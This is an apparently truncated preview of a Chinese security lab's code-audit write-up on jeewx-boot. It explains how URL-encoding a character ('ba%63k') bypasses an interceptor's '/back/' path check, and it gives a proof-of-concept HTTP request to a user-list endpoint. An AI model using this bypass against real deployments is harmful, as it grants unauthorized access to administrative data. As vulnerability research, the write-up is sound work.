专栏名称: 宸极实验室
『宸极实验室』隶属山东九州信泰信息科技股份有限公司,是山东省发改委认定的“网络安全对抗关键技术山东省工程实验室”。实验室圆满完成了多次国家级、省部级重要网络安全保障和攻防演习活动,并积极参加各类网络安全竞赛,屡获殊荣。
今天看啥  ›  专栏  ›  宸极实验室

『代码审计』jeewx-boot 代码审计

宸极实验室  · 公众号  ·  · 2024-08-12 17:00
    

文章预览

点击蓝字 关注我们 日期:2024年08月12日 作者:ICDAT 介绍:这篇文章主要是对jeewx-boot进行代码审计。 0x00 前言 在最近的挖洞过程中,遇到了一个 jeewx-boot ,发现其在 github 上有源码,就对该项目进行了代码审计。 0x01 未授权访问漏洞 这个项目 base-system 是主要的模块, JeewxBootApplication 是启动类。 查看 interceptors 的拦截器。 这里只是对用户请求的访问地址是否存在 /back/ 进行判断,根据之前的学习,在 spring mvc 的全版本中存在 url 编码的方式进行绕过。 web 验证: 对 c 进行 url 编码后,成功未授权。 poc : GET /jeewx/system/ba%63k/jwSystemUser/list.do HTTP/1.1 Host : 10.27.2.192 Pragma : no-cache Cache-Control : no-cache Upgrade-Insecure-Requests : 1 User-Agent : Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept : text/html,application/xhtml+xml,applicat ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览